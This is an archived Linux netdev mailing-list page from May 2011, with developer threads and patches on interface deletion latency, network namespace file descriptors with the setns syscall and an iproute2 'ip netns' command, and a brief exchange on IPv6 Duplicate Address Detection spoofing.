Netdev List

Netdev List
 help / color / mirror / Atom feed

* Re: Scalability of interface creation and deletion
From: Eric Dumazet @ 2011-05-07 15:54 UTC (permalink / raw)
  To: Alex Bligh; +Cc: netdev
In-Reply-To: <0F4A638C2A523577CDBC295E@Ximines.local>

Le samedi 07 mai 2011 à 16:26 +0100, Alex Bligh a écrit :
> Well, I patched it (patch attached for what it's worth) and it made
> no difference in this case. I would suggest however that it might
> be the right think to do anyway.
> 

As I said, this code should not be entered in normal situations.

You are not the first to suggest a change, but it wont help you at all.




> On the current 8 core box I am testing, I see 280ms per interface
> delete **even with only 10 interfaces**. I see 260ms with one
> interface. I know doing lots of rcu sync stuff can be slow, but
> 260ms to remove one veth pair sounds like more than rcu sync going
> on. It sounds like a sleep (though I may not have found the
> right one). I see no CPU load.
> 
> Equally, with one interface (remember I'm doing this in unshare -n
> so there is only a loopback interface there), this bit surely
> can't be sysfs.
> 

synchronize_rcu() calls are not consuming cpu, they just _wait_
rcu grace period.

I suggest you read Documentation/RCU files if you really want to :)

If you want to check how expensive it is, its quite easy:
add a trace in synchronize_net() 

diff --git a/net/core/dev.c b/net/core/dev.c
index 856b6ee..70f3c46 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -5915,8 +5915,10 @@ EXPORT_SYMBOL(free_netdev);
  */
 void synchronize_net(void)
 {
+	pr_err("begin synchronize_net()\n");
 	might_sleep();
 	synchronize_rcu();
+	pr_err("end synchronize_net()\n");
 }
 EXPORT_SYMBOL(synchronize_net);
 






^ permalink raw reply related

* Re: Scalability of interface creation and deletion
From: Alex Bligh @ 2011-05-07 15:26 UTC (permalink / raw)
  To: Eric Dumazet; +Cc: netdev, Alex Bligh
In-Reply-To: <1304770926.2821.1157.camel@edumazet-laptop>

Eric,

>> 1. Interface creation slows down hugely with more interfaces
>
> sysfs is the problem, a very well known one.
> (sysfs_refresh_inode(),

Thanks

>> 2. Interface deletion is normally much slower than interface creation
>>
>> strace -T -ttt on the "ip" command used to do this does not show the
>> delay where I thought it would be - cataloguing the existing interfaces.
>> Instead, it's the final send() to the netlink socket which does the
>> relevant action which appears to be slow, for both addition and detion.
>> Adding the last interface takes 200ms in that syscall, the first is
>> quick (symptomatic of a slowdown); for deletion the last send syscall is
>> quick.
>
>> I am having difficulty seeing what might be the issue in interface
>> creation. Any ideas?
>>
>
> Actually a lot, just make
>
> git log net/core/dev.c
>
> and you'll see many commits to make this faster.

OK. I am up to 2.6.38.2 and see no improvement by then. I will
try something bleeding edge in a bit.

>> I am guessing that this is going to do the msleep 50% of the time,
>> explaining 125ms of the observed time. How would people react to
>> exponential backoff instead (untested):
>>
>> 	int backoff = 10;
>>         refcnt = netdev_refcnt_read(dev);
>>
>>         while (refcnt != 0) {
>>                 ...
>>                 msleep(backoff);
>>                 if ((backoff *= 2) > 250)
>>                   backoff = 250;
>> 		
>>                 refcnt = netdev_refcnt_read(dev);
>> 		....
>>         }
>>
>>
>
> Welcome to the club. This is what is discussed on netdev since many
> years. Lot of work had been done to make it better.

Well, I patched it (patch attached for what it's worth) and it made
no difference in this case. I would suggest however that it might
be the right think to do anyway.

> Interface deletion needs several rcu synch calls, they are very
> expensive. This is the price to pay to have lockless network stack in
> fast paths.

On the current 8 core box I am testing, I see 280ms per interface
delete **even with only 10 interfaces**. I see 260ms with one
interface. I know doing lots of rcu sync stuff can be slow, but
260ms to remove one veth pair sounds like more than rcu sync going
on. It sounds like a sleep (though I may not have found the
right one). I see no CPU load.

Equally, with one interface (remember I'm doing this in unshare -n
so there is only a loopback interface there), this bit surely
can't be sysfs.

-- 
Alex Bligh

Signed-off-by: Alex Bligh <alex@alex.org.uk>
diff --git a/net/core/dev.c b/net/core/dev.c
index 6561021..f55c95c 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -5429,6 +5429,7 @@ static void netdev_wait_allrefs(struct net_device 
*dev)
 {
        unsigned long rebroadcast_time, warning_time;
        int refcnt;
+       int backoff = 5;

        linkwatch_forget_dev(dev);

@@ -5460,7 +5461,9 @@ static void netdev_wait_allrefs(struct net_device 
*dev)
                        rebroadcast_time = jiffies;
                }

-               msleep(250);
+               msleep(backoff);
+               if ((backoff *= 2) > 250)
+                 backoff = 250;

                refcnt = netdev_refcnt_read(dev);





^ permalink raw reply related

* Re: Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Gervais Arthur @ 2011-05-07 14:35 UTC (permalink / raw)
  To: Eric Dumazet; +Cc: Jan Ceuleers, netdev
In-Reply-To: <1304777182.2821.1262.camel@edumazet-laptop>

On 05/07/2011 04:06 PM, Eric Dumazet wrote:
 > Le samedi 07 mai 2011 à 15:54 +0200, Gervais Arthur a écrit :
 >
 >> Why would the victim itself claim already having the IPv6 address?
 >>
 >
 > Why should it care ? Please point me the RFC saying its illegal to send
 > or receive a frame with SRC_MAC == DST_MAC
 >

There is no RFC statement saying that this is illegal. But we are not 
only talking about the Ethernet layer. There is also the ICMPv6 Layer.

But neither in the IPv6 RFC's I can find something about this.


^ permalink raw reply

* Re: Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Mikael Abrahamsson @ 2011-05-07 14:21 UTC (permalink / raw)
  To: Gervais Arthur; +Cc: Eric Dumazet, Jan Ceuleers, netdev
In-Reply-To: <842648e0f4a8c6f7cd8a47cd6916a939@mail.insa-lyon.fr>

On Sat, 7 May 2011, Gervais Arthur wrote:

> If the network administrator is using some IDS like NDPMon 
> (http://ndpmon.sourceforge.net/) to detect a DAD DoS attacks, and the 
> attacker changes the MAC address like I described, it will not detect 
> the DAD DoS attack anymore (because the victim itself claims already 
> having the IPv6 address).

If the network admin allows anyone to source any packet then they're 
already screwed. Networks need IETF SAVI-WG functionality to secure their 
network, if spoofing is allowed it's already too late.

The earlier network admins realise this and stop just trying to monitor 
the problem, the better.

-- 
Mikael Abrahamsson    email: swmike@swm.pp.se

^ permalink raw reply

* Re: [PATCH 0/7] Network namespace manipulation with file descriptors
From: Eric W. Biederman @ 2011-05-07 14:18 UTC (permalink / raw)
  To: Alex Bligh
  Cc: linux-arch, netdev, linux-kernel, Linux Containers, linux-fsdevel
In-Reply-To: <3A54AB469A0294933EAC2257@nimrod.local>

Alex Bligh <alex@alex.org.uk> writes:

> --On 6 May 2011 19:23:29 -0700 "Eric W. Biederman" <ebiederm@xmission.com>
> wrote:
>
>> This patchset addresses the user interface limitations by introducing
>> proc files you can open to get file descriptors that keep alive and
>> refer to your a tasks namespaces.  Those file descriptors can be passed
>> to the new setns system call or the NET_NS_FD argument in netlink
>> messages.
>
> This is conceptually very interesting. I am one of those people you
> describe with a routing daemon (or more accurately a wrapper around
> existing daemons) that does the unshare() and keeps the network
> alive. It also has a control socket etc.
>
> You say:
>> This addresses three specific problems that can make namespaces hard to
>> work with.
>> - Namespaces require a dedicated process to pin them in memory.
>> - It is not possible to use a namespace unless you are the child
>>   of the original creator.
>> - Namespaces don't have names that userspace can use to talk about
>>   them.
>
> At least for me, the best way to solve the second blob would be to
> be able to unshare to an existing namespace. That way I would be able
> to run a daemon (without modification) in a pre-existing namespace.
> The user interface here would just be an option to 'unshare'. I
> don't think your patch allows this, does it?  Right now I'm effectively
> doing that by causing the pid concerned to fork() and do my bidding,
> but that is far from perfect.

You are essentially describing my setns system call.

> As a secondary issue, ever without your patch, it would be really
> useful to be able to read from userspace the current network namespace.
> (i.e. the pid concerned, or 1 if not unshared). I would like to
> simply modify a routing daemon's init script so it doesn't start
> if in the host, e.g. at the top:
>  [ `cat /proc/.../networknamespace` eq 1 ] && exit 0

You can read the processes network namespace by opening
/proc/<pid>/ns/net.  Unfortunately comparing the network
namespaces for identity is another matter.  You will probably
be better off simply forcing the routing daemon to start
in the desired network namespace in it's initscript.

For purposes of clarity please have a look at my work in
progress patch for iproute2.  This demonstrates how I expect
userspace to work in a multi-network namespace world.

Eric


>From f773bd66c2e31e1ac55b65ce5bc2c17f8845ce5c Mon Sep 17 00:00:00 2001
From: "Eric W. Biederman" <ebiederm@xmission.com>
Date: Fri, 6 May 2011 00:01:45 -0700
Subject: [PATCH] iproute2:  Add processless netnwork namespace support.

The goal of this code change is to implement a mechanism
such that it is simple to work with a kernel that is
using multiple network namespaces at once.

This comes in handy for interacting with vpns where
there may be rfc1918 address overlaps, and different
policies default routes, name servers and the like.

Configuration specific to a network namespace that
would ordinarily be stored under /etc/ is stored under
/etc/netns/<name>.  For example if the dns server
configuration is different for your vpn you would
create a file /etc/netns/myvpn/resolv.conf.

File descriptors that can be used to manipulate a
network namespace can be created by opening
/var/run/netns/<NAME>.

This adds the following commands to iproute.
ip netns add NAME
ip netns delete NAME
ip netns monitor
ip netns list
ip netns exec NAME cmd ....
ip link set DEV netns NAME

ip netns exec exists to cater the vast majority of programs
that only know how to operate in a single network namespace.
ip netns exec changes the default network namespace, creates
a new mount namespace, remounts /sys and bind mounts netns
specific configuration files to their standard locations.

Signed-off-by: Eric W. Biederman <ebiederm@xmission.com>
---
 include/linux/if_link.h |    1 +
 ip/Makefile             |    2 +-
 ip/ip.c                 |    4 +-
 ip/ip_common.h          |    2 +
 ip/iplink.c             |    8 +-
 ip/ipnetns.c            |  320 +++++++++++++++++++++++++++++++++++++++++++++++
 man/man8/ip.8           |   56 ++++++++
 7 files changed, 389 insertions(+), 4 deletions(-)
 create mode 100644 ip/ipnetns.c

diff --git a/include/linux/if_link.h b/include/linux/if_link.h
index e4a3a2d..304c44f 100644
--- a/include/linux/if_link.h
+++ b/include/linux/if_link.h
@@ -136,6 +136,7 @@ enum {
 	IFLA_PORT_SELF,
 	IFLA_AF_SPEC,
 	IFLA_GROUP,		/* Group the device belongs to */
+	IFLA_NET_NS_FD,
 	__IFLA_MAX
 };
 
diff --git a/ip/Makefile b/ip/Makefile
index 6054e8a..2ee4e7c 100644
--- a/ip/Makefile
+++ b/ip/Makefile
@@ -1,4 +1,4 @@
-IPOBJ=ip.o ipaddress.o ipaddrlabel.o iproute.o iprule.o \
+IPOBJ=ip.o ipaddress.o ipaddrlabel.o iproute.o iprule.o ipnetns.o \
     rtm_map.o iptunnel.o ip6tunnel.o tunnel.o ipneigh.o ipntable.o iplink.o \
     ipmaddr.o ipmonitor.o ipmroute.o ipprefix.o iptuntap.o \
     ipxfrm.o xfrm_state.o xfrm_policy.o xfrm_monitor.o \
diff --git a/ip/ip.c b/ip/ip.c
index b127d57..7f0c468 100644
--- a/ip/ip.c
+++ b/ip/ip.c
@@ -44,7 +44,8 @@ static void usage(void)
 "Usage: ip [ OPTIONS ] OBJECT { COMMAND | help }\n"
 "       ip [ -force ] -batch filename\n"
 "where  OBJECT := { link | addr | addrlabel | route | rule | neigh | ntable |\n"
-"                   tunnel | tuntap | maddr | mroute | mrule | monitor | xfrm }\n"
+"                   tunnel | tuntap | maddr | mroute | mrule | monitor | xfrm |\n"
+"                   netns }\n"
 "       OPTIONS := { -V[ersion] | -s[tatistics] | -d[etails] | -r[esolve] |\n"
 "                    -f[amily] { inet | inet6 | ipx | dnet | link } |\n"
 "                    -l[oops] { maximum-addr-flush-attempts } |\n"
@@ -80,6 +81,7 @@ static const struct cmd {
 	{ "xfrm",	do_xfrm },
 	{ "mroute",	do_multiroute },
 	{ "mrule",	do_multirule },
+	{ "netns",	do_netns },
 	{ "help",	do_help },
 	{ 0 }
 };
diff --git a/ip/ip_common.h b/ip/ip_common.h
index a114186..5e5fb76 100644
--- a/ip/ip_common.h
+++ b/ip/ip_common.h
@@ -38,6 +38,7 @@ extern int do_ipmonitor(int argc, char **argv);
 extern int do_multiaddr(int argc, char **argv);
 extern int do_multiroute(int argc, char **argv);
 extern int do_multirule(int argc, char **argv);
+extern int do_netns(int argc, char **argv);
 extern int do_xfrm(int argc, char **argv);
 
 static inline int rtm_get_table(struct rtmsg *r, struct rtattr **tb)
@@ -64,6 +65,7 @@ struct link_util
 };
 
 struct link_util *get_link_kind(const char *kind);
+int get_netns_fd(const char *name);
 
 #ifndef	INFINITY_LIFE_TIME
 #define     INFINITY_LIFE_TIME      0xFFFFFFFFU
diff --git a/ip/iplink.c b/ip/iplink.c
index 48c0254..e5325a6 100644
--- a/ip/iplink.c
+++ b/ip/iplink.c
@@ -67,6 +67,7 @@ void iplink_usage(void)
 	fprintf(stderr, "	                  [ broadcast LLADDR ]\n");
 	fprintf(stderr, "	                  [ mtu MTU ]\n");
 	fprintf(stderr, "	                  [ netns PID ]\n");
+	fprintf(stderr, "	                  [ netns NAME ]\n");
 	fprintf(stderr, "			  [ alias NAME ]\n");
 	fprintf(stderr, "	                  [ vf NUM [ mac LLADDR ]\n");
 	fprintf(stderr, "				   [ vlan VLANID [ qos VLAN-QOS ] ]\n");
@@ -304,9 +305,12 @@ int iplink_parse(int argc, char **argv, struct iplink_req *req,
                         NEXT_ARG();
                         if (netns != -1)
                                 duparg("netns", *argv);
-                        if (get_integer(&netns, *argv, 0))
+			if ((netns = get_netns_fd(*argv)) >= 0)
+				addattr_l(&req->n, sizeof(*req), IFLA_NET_NS_FD, &netns, 4);
+			else if (get_integer(&netns, *argv, 0) == 0)
+				addattr_l(&req->n, sizeof(*req), IFLA_NET_NS_PID, &netns, 4);
+			else
                                 invarg("Invalid \"netns\" value\n", *argv);
-                        addattr_l(&req->n, sizeof(*req), IFLA_NET_NS_PID, &netns, 4);
 		} else if (strcmp(*argv, "multicast") == 0) {
 			NEXT_ARG();
 			req->i.ifi_change |= IFF_MULTICAST;
diff --git a/ip/ipnetns.c b/ip/ipnetns.c
new file mode 100644
index 0000000..efb7fd2
--- /dev/null
+++ b/ip/ipnetns.c
@@ -0,0 +1,320 @@
+#define _ATFILE_SOURCE
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/inotify.h>
+#include <sys/mount.h>
+#include <sys/param.h>
+#include <stdio.h>
+#include <string.h>
+#include <sched.h>
+#include <fcntl.h>
+#include <dirent.h>
+#include <errno.h>
+#include <unistd.h>
+
+#include "utils.h"
+#include "ip_common.h"
+
+#define NETNS_RUN_DIR "/var/run/netns"
+#define NETNS_ETC_DIR "/etc/netns"
+
+#ifdef __x86_64__
+#define PRIVATE_SYS_setns 307
+#endif
+
+#ifdef __i386__
+#define PRIVATE_SYS_setns 345
+#endif
+
+#ifndef SYS_setns
+#define SYS_setns PRIVATE_SYS_setns
+#endif
+
+#ifndef CLONE_NEWNET
+#define CLONE_NEWNET 0x40000000	/* New network namespace (lo, device, names sockets, etc) */
+#endif
+
+#ifndef MNT_DETACH
+#define MNT_DETACH	0x00000002	/* Just detach from the tree */
+#endif /* MNT_DETACH */
+
+
+static int setns(int fd, int nstype)
+{
+	return syscall(SYS_setns, fd, nstype);
+}
+
+static int touch(const char *path, mode_t mode)
+{
+	int fd;
+	fd = open(path, O_RDONLY|O_CREAT, mode);
+	if (fd < 0)
+		return -1;
+	close(fd);
+	return 0;
+}
+
+static void usage(void) __attribute__((noreturn));
+
+static void usage(void)
+{
+	fprintf(stderr, "Usage: ip netns list\n");
+	fprintf(stderr, "       ip netns add NAME\n");
+	fprintf(stderr, "       ip netns delete NAME\n");
+	fprintf(stderr, "       ip netns exec NAME cmd ...\n");
+	fprintf(stderr, "       ip netns monitor\n");
+	exit(-1);
+}
+
+int get_netns_fd(const char *name)
+{
+	char pathbuf[MAXPATHLEN];
+	const char *path, *ptr;
+
+	path = name;
+	ptr = strchr(name, '/');
+	if (!ptr) {
+		snprintf(pathbuf, sizeof(pathbuf), "%s/%s",
+			NETNS_RUN_DIR, name );
+		path = pathbuf;
+	}
+	return open(path, O_RDONLY);
+}
+
+static int netns_list(int argc, char **argv)
+{
+	struct dirent *entry;
+	DIR *dir;
+
+	dir = opendir(NETNS_RUN_DIR);
+	if (!dir)
+		return 0;
+
+	while ((entry = readdir(dir)) != NULL) {
+		if (strcmp(entry->d_name, ".") == 0)
+			continue;
+		if (strcmp(entry->d_name, "..") == 0)
+			continue;
+		printf("%s\n", entry->d_name);
+	}
+	closedir(dir);
+	return 0;
+}
+
+static void bind_etc(const char *name)
+{
+	char etc_netns_path[MAXPATHLEN];
+	char netns_name[MAXPATHLEN];
+	char etc_name[MAXPATHLEN];
+	struct dirent *entry;
+	DIR *dir;
+
+	snprintf(etc_netns_path, sizeof(etc_netns_path), "%s/%s", NETNS_ETC_DIR, name);
+	dir = opendir(etc_netns_path);
+	if (!dir)
+		return;
+
+	while ((entry = readdir(dir)) != NULL) {
+		if (strcmp(entry->d_name, ".") == 0)
+			continue;
+		if (strcmp(entry->d_name, "..") == 0)
+			continue;
+		snprintf(netns_name, sizeof(netns_name), "%s/%s", etc_netns_path, entry->d_name);
+		snprintf(etc_name, sizeof(etc_name), "/etc/%s", entry->d_name);
+		if (mount(netns_name, etc_name, "none", MS_BIND, NULL) < 0) {
+			fprintf(stderr, "Bind %s -> %s failed: %s\n",
+				netns_name, etc_name, strerror(errno));
+		}
+	}
+	closedir(dir);
+}
+
+static int netns_exec(int argc, char **argv)
+{
+	/* Setup the proper environment for apps that are not netns
+	 * aware, and execute a program in that environment.
+	 */
+	const char *name, *cmd;
+	char net_path[MAXPATHLEN];
+	int netns;
+
+	if (argc < 1) {
+		fprintf(stderr, "No netns name specified\n");
+		return -1;
+	}
+	if (argc < 2) {
+		fprintf(stderr, "No cmd specified\n");
+		return -1;
+	}
+	name = argv[0];
+	cmd = argv[1];
+	snprintf(net_path, sizeof(net_path), "%s/%s", NETNS_RUN_DIR, name);
+	netns = open(net_path, O_RDONLY);
+	if (netns < 0) {
+		fprintf(stderr, "Cannot open network namespace: %s\n",
+			strerror(errno));
+		return -1;
+	}
+	if (setns(netns, CLONE_NEWNET) < 0) {
+		fprintf(stderr, "seting the network namespace failed: %s\n",
+			strerror(errno));
+		return -1;
+	}
+
+	if (unshare(CLONE_NEWNS) < 0) {
+		fprintf(stderr, "unshare failed: %s\n", strerror(errno));
+		return -1;
+	}
+	/* Mount a version of /sys that describes the network namespace */
+	if (umount2("/sys", MNT_DETACH) < 0) {
+		fprintf(stderr, "umount of /sys failed: %s\n", strerror(errno));
+		return -1;
+	}
+	if (mount(name, "/sys", "sysfs", 0, NULL) < 0) {
+		fprintf(stderr, "mount of /sys failed: %s\n",strerror(errno));
+		return -1;
+	}
+
+	/* Setup bind mounts for config files in /etc */
+	bind_etc(name);
+
+	if (execvp(cmd, argv + 1)  < 0)
+		fprintf(stderr, "exec of %s failed: %s\n",
+			cmd, strerror(errno));
+	exit(-1);
+}
+
+static int netns_delete(int argc, char **argv)
+{
+	const char *name;
+	char netns_path[MAXPATHLEN];
+
+	if (argc < 1) {
+		fprintf(stderr, "No netns name specified\n");
+		return -1;
+	}
+
+	name = argv[0];
+	snprintf(netns_path, sizeof(netns_path), "%s/%s", NETNS_RUN_DIR, name);
+	umount2(netns_path, MNT_DETACH);
+	if (unlink(netns_path) < 0) {
+		fprintf(stderr, "Cannot remove %s: %s\n",
+			netns_path, strerror(errno));
+		return -1;
+	}
+	return 0;
+}
+
+static int netns_add(int argc, char **argv)
+{
+	/* This function creates a new network namespace and
+	 * a new mount namespace and bind them into a well known
+	 * location in the filesystem based on the name provided.
+	 *
+	 * The mount namespace is created so that any necessary
+	 * userspace tweaks like remounting /sys, or bind mounting
+	 * a new /etc/resolv.conf can be shared between uers.
+	 */
+	char netns_path[MAXPATHLEN];
+	const char *name;
+
+	if (argc < 1) {
+		fprintf(stderr, "No netns name specified\n");
+		return -1;
+	}
+	name = argv[0];
+
+	snprintf(netns_path, sizeof(netns_path), "%s/%s", NETNS_RUN_DIR, name);
+
+	/* Create the base netns directory if it doesn't exist */
+	mkdir(NETNS_RUN_DIR, S_IRWXU|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH);
+
+	/* Create the filesystem state */
+	if (touch(netns_path, 0) < 0) {
+		fprintf(stderr, "Could not create %s: %s\n",
+			netns_path, strerror(errno));
+		goto out_delete;
+	}
+	if (unshare(CLONE_NEWNET) < 0) {
+		fprintf(stderr, "Failed to create a new network namespace: %s\n",
+			strerror(errno));
+		goto out_delete;
+	}
+
+	/* Bind the netns last so I can watch for it */
+	if (mount("/proc/self/ns/net", netns_path, "none", MS_BIND, NULL) < 0) {
+		fprintf(stderr, "Bind /proc/self/ns/net -> %s failed: %s\n",
+			netns_path, strerror(errno));
+		goto out_delete;
+	}
+	return 0;
+out_delete:
+	netns_delete(argc, argv);
+	exit(-1);
+	return -1;
+}
+
+
+static int netns_monitor(int argc, char **argv)
+{
+	char buf[4096];
+	struct inotify_event *event;
+	int fd;
+	fd = inotify_init();
+	if (fd < 0) {
+		fprintf(stderr, "inotify_init failed: %s\n",
+			strerror(errno));
+		return -1;
+	}
+	if (inotify_add_watch(fd, NETNS_RUN_DIR, IN_CREATE | IN_DELETE) < 0) {
+		fprintf(stderr, "inotify_add_watch failed: %s\n",
+			strerror(errno));
+		return -1;
+	}
+	for(;;) {
+		ssize_t len = read(fd, buf, sizeof(buf));
+		if (len < 0) {
+			fprintf(stderr, "read failed: %s\n",
+				strerror(errno));
+			return -1;
+		}
+		for (event = (struct inotify_event *)buf;
+		     (char *)event < &buf[len];
+		     event = (struct inotify_event *)((char *)event + sizeof(*event) + event->len)) {
+			if (event->mask & IN_CREATE)
+				printf("add %s\n", event->name);
+			if (event->mask & IN_DELETE)
+				printf("delete %s\n", event->name);
+		}
+	}
+	return 0;
+}
+
+int do_netns(int argc, char **argv)
+{
+	if (argc < 1)
+		return netns_list(0, NULL);
+
+	if ((matches(*argv, "list") == 0) || (matches(*argv, "show") == 0) ||
+	    (matches(*argv, "lst") == 0))
+		return netns_list(argc-1, argv+1);
+
+	if (matches(*argv, "help") == 0)
+		usage();
+
+	if (matches(*argv, "add") == 0)
+		return netns_add(argc-1, argv+1);
+
+	if (matches(*argv, "delete") == 0)
+		return netns_delete(argc-1, argv+1);
+
+	if (matches(*argv, "exec") == 0)
+		return netns_exec(argc-1, argv+1);
+
+	if (matches(*argv, "monitor") == 0)
+		return netns_monitor(argc-1, argv+1);
+
+	fprintf(stderr, "Command \"%s\" is unknown, try \"ip netns help\".\n", *argv);
+	exit(-1);
+}
diff --git a/man/man8/ip.8 b/man/man8/ip.8
index c5248ef..1935dc5 100644
--- a/man/man8/ip.8
+++ b/man/man8/ip.8
@@ -85,6 +85,9 @@ ip \- show / manipulate routing, devices, policy routing and tunnels
 .B  netns
 .IR PID " |"
 .br
+.B  netns
+.IR NETNSNAME " |"
+.br
 .B alias
 .IR NAME  " |"
 .br
@@ -162,6 +165,17 @@ tentative " | " deprecated " | " dadfailed " | " temporary " ]"
 .BR "ip addrlabel" " { " list " | " flush " }"
 
 .ti -8
+.BR "ip netns" " { " list " | " monitor " } "
+
+.ti -8
+.BR "ip netns" " { " add " | " delete " } "
+.I NETNSNAME
+
+.ti -8
+.BR "ip netns exec "
+.I NETNSNAME command ...
+
+.ti -8
 .BR "ip route" " { "
 .BR list " | " flush " } "
 .I  SELECTOR
@@ -1006,6 +1020,11 @@ move the device to the network namespace associated with the process
 .IR "PID".
 
 .TP
+.BI netns " NETNSNAME"
+move the device to the network namespace associated with name
+.IR "NETNSNAME".
+
+.TP
 .BI alias " NAME"
 give the device a symbolic name for easy reference.
 
@@ -2470,6 +2489,43 @@ at any time.
 It prepends the history with the state snapshot dumped at the moment
 of starting.
 
+.SH ip netns - process network namespace management
+
+A network namespace is logically another copy of the network stack,
+with it's own routes, firewall rules, and network devices.
+
+By convention a named network namespace is an object at
+.BR "/var/run/netns/" NAME
+that can be opened.  The file descriptor resulting from opening
+.BR "/var/run/netns/" NAME 
+refers to the specified network namespace.  Holding that file
+descriptor open keeps the network namespace alive.  The file
+descriptor can be used with the
+.B setns(2)
+system call to change the network namespace associated with a task.
+
+The convention for network namespace aware applications is to look
+for global network configuration files first in
+.BR "/etc/netns/" NAME "/"
+then in
+.BR "/etc/".
+For example, if you want a different version of
+.BR /etc/resolv.conf
+for a network namespace used to isolate your vpn you would name it
+.BR /etc/netns/myvpn/resolv.conf.
+
+.B ip netns exec
+automates handling of this configuration, file convention for network
+namespace unaware applications, by creating a mount namespace and
+bind mounting all of the per network namespace configure files into
+their traditional location in /etc.
+
+.SS ip netns list - show all of the named network namespaces
+.SS ip netns monitor - report when network namespace names are created and destroyed
+.SS ip netns add NAME - create a new named network namespace
+.SS ip netns delete NAME - delete the name of a network namespace
+.SS ip netns exec NAME cmd ... - Run cmd in the named network namespace
+
 .SH ip xfrm - setting xfrm
 xfrm is an IP framework, which can transform format of the datagrams,
 .br
-- 
1.7.5.1.217.g4e3aa


^ permalink raw reply related

* Re: [PATCH 7/7] ns: Wire up the setns system call
From: Eric W. Biederman @ 2011-05-07 14:09 UTC (permalink / raw)
  To: Geert Uytterhoeven
  Cc: linux-arch, linux-kernel, netdev, linux-fsdevel, jamal,
	Daniel Lezcano, Linux Containers, Renato Westphal
In-Reply-To: <BANLkTi=G-uViB6=8bQ0dRGbw3Gg8V10CRw@mail.gmail.com>

Geert Uytterhoeven <geert@linux-m68k.org> writes:

> On Sat, May 7, 2011 at 04:25, Eric W. Biederman <ebiederm@xmission.com> wrote:
>>  arch/m68k/include/asm/unistd.h         |    3 ++-
>>  arch/m68k/kernel/syscalltable.S        |    1 +
>
> As the unified syscalltable for m68k/m68knommu is not yet in mainline
> (planned for
> 2.6.40), you should also add it to arch/m68k/kernel/entry_mm.S.
>
> Gr{oetje,eeting}s,

Like so?

From c06a03281d944ed36e2da02f5374ec6c650e4988 Mon Sep 17 00:00:00 2001
From: "Eric W. Biederman" <ebiederm@xmission.com>
Date: Sat, 7 May 2011 07:00:24 -0700
Subject: [PATCH] m68knommu: Wire up the setns system call

It seems I overlooked m68knommu where I wired up this syscall.

Reported-by:  Geert Uytterhoeven <geert@linux-m68k.org>
Signed-off-by: Eric W. Biederman <ebiederm@xmission.com>
---
 arch/m68k/kernel/entry_mm.S |    1 +
 1 files changed, 1 insertions(+), 0 deletions(-)

diff --git a/arch/m68k/kernel/entry_mm.S b/arch/m68k/kernel/entry_mm.S
index 1359ee6..e048015 100644
--- a/arch/m68k/kernel/entry_mm.S
+++ b/arch/m68k/kernel/entry_mm.S
@@ -754,4 +754,5 @@ sys_call_table:
 	.long sys_open_by_handle_at
 	.long sys_clock_adjtime
 	.long sys_syncfs
+	.long sys_setns
 
-- 
1.7.5.1.217.g4e3aa

--
To unsubscribe from this list: send the line "unsubscribe linux-fsdevel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply related

* Re: Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Eric Dumazet @ 2011-05-07 14:06 UTC (permalink / raw)
  To: Gervais Arthur; +Cc: Jan Ceuleers, netdev
In-Reply-To: <842648e0f4a8c6f7cd8a47cd6916a939@mail.insa-lyon.fr>

Le samedi 07 mai 2011 à 15:54 +0200, Gervais Arthur a écrit :

> Why would the victim itself claim already having the IPv6 address?
> 

Why should it care ? Please point me the RFC saying its illegal to send
or receive a frame with SRC_MAC == DST_MAC






^ permalink raw reply

* Re: [PATCH 7/7] ns: Wire up the setns system call
From: Mike Frysinger @ 2011-05-07 13:59 UTC (permalink / raw)
  To: Eric W. Biederman
  Cc: linux-arch, linux-kernel, netdev, linux-fsdevel, jamal,
	Daniel Lezcano, Linux Containers, Renato Westphal
In-Reply-To: <1304735101-1824-7-git-send-email-ebiederm@xmission.com>

On Fri, May 6, 2011 at 22:25, Eric W. Biederman wrote:
> v2: Most of the architecture support added by Daniel Lezcano <dlezcano@fr.ibm.com>
> v3: ported to v2.6.36-rc4 by: Eric W. Biederman <ebiederm@xmission.com>
> v4: Moved wiring up of the system call to another patch
> v5: ported to v2.6.39-rc6
>
>  arch/blackfin/include/asm/unistd.h     |    3 ++-
>  arch/blackfin/mach-common/entry.S      |    1 +

Acked-by: Mike Frysinger <vapier@gentoo.org>
-mike

^ permalink raw reply

* Re: [PATCH 2/7] ns: Introduce the setns syscall
From: Eric W. Biederman @ 2011-05-07 13:57 UTC (permalink / raw)
  To: Rémi Denis-Courmont
  Cc: linux-arch, linux-kernel, netdev, linux-fsdevel, jamal,
	Daniel Lezcano, Linux Containers, Renato Westphal
In-Reply-To: <201105071101.10950.remi@remlab.net>

"Rémi Denis-Courmont" <remi@remlab.net> writes:

> Le samedi 7 mai 2011 05:24:56 Eric W. Biederman, vous avez écrit :
>> Pieces of this puzzle can also be solved by instead of
>> coming up with a general purpose system call coming up
>> with targed system calls perhaps socketat that solve
>> a subset of the larger problem.  Overall that appears
>> to be more work for less reward.
>
> socketat() is still required for multithreaded namespace-aware userspace, I 
> believe.

The network namespace is a per task property so there are no problems
with multithreaded network namespace aware userspace applications.  The
implementation of a userspace socketat will still need to disable signal
handling around the network namespace switch to be signal safe.  Which
means that ultimately a kernel version of socketat may be desirable,
for performance reasons but I know of know correctness reasons to need
it.

For the time being I have simply removed socketat from what I plan to
merge because it is not strictly needed, I don't yet have a test case
for socketat, and I don't have as much time to work on this as I
would like.

There is one bug a multi-threaded network namespace aware user space
application might run into, and that is /proc/net is a symlink to
/proc/self.  Which means that if you open /proc/net/foo from a task with
a different network namespace than your the task whose tid equals your
tgid, the /proc/net will return the wrong file.  Still you can
avoid even that silliness by opening /proc/<tid>/net.

Eric
--
To unsubscribe from this list: send the line "unsubscribe linux-fsdevel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply

* Re: Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Gervais Arthur @ 2011-05-07 13:54 UTC (permalink / raw)
  To: Eric Dumazet; +Cc: Jan Ceuleers, netdev
